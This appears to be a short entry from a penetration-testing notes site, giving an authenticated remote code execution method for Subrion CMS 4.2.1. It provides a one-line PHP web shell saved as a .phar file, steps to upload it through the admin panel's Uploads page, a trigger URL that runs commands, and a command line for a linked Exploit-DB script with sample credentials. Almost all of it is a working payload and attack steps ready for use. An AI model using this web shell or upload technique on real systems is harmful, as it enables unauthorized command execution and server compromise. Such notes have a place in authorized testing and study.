Subrion CMS 4.2.1

Need user creds and access to admin panel

[1]From kali, craft an RCE script and save as .phar file <?php system($_GET['cmd']); ?> [2] Saved on kali as: exploit.phar [3] From Subrion admin panel navigate to Content → Uploads Just drag and drop, save file and right click on it to copy the file location [4] Trigger RCE http://10.10.10.10/uploads/exploit.phar?cmd=id (# location of exploit might vary)

#There is also an authenticated exploit on exploitdb https://www.exploit-db.com/exploits/49876

python3 exploit.py -u http://10.10.10.10/panel/-l 'admin' -p "password123456"

Previous/.git NextFuel CMS

Last updated 3 years ago